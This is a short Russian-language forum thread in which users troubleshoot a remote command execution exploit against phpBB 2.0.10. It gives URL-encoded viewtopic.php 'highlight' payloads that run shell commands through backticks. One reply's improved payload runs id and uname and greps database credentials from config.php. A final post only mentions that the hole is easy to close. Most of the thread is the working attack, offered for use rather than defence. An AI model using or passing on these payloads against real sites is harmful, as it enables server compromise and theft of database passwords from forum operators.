Привет всем! Господа, подскажите, плиз, что не так. Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=cd%20..;id;ls;pwd Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите. Заранее спасибо.
Попробуй лучше вот так: &highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db
Да, тот метод закрывается легко. Кому интересно как, см. на моем форуме: http://hacsoft.h14.ru/phpBB2/viewtopic.php?t=94